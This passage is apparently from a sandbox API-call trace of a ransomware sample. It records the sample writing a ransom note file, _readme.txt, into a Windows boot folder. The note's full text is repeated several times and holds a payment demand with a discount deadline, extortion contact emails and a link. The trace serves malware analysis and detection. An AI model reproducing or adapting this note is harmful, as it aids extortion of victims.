hHeap=0x4970000) returned 1 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.055] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.055] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.055] PathFindFileNameW (pszPath="") returned="" [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.055] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.056] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0128.056] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.056] FreeLibrary (hLibModule=0x759d0000) returned 1 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0128.056] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.056] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0128.056] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.056] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0128.057] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0128.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0128.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0128.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0128.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0128.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0128.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.057] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0128.057] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0128.058] CloseHandle (hObject=0x5c4) returned 1 [0128.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0128.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0128.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0128.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.059] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38dea20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38dea20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.059] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.059] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: 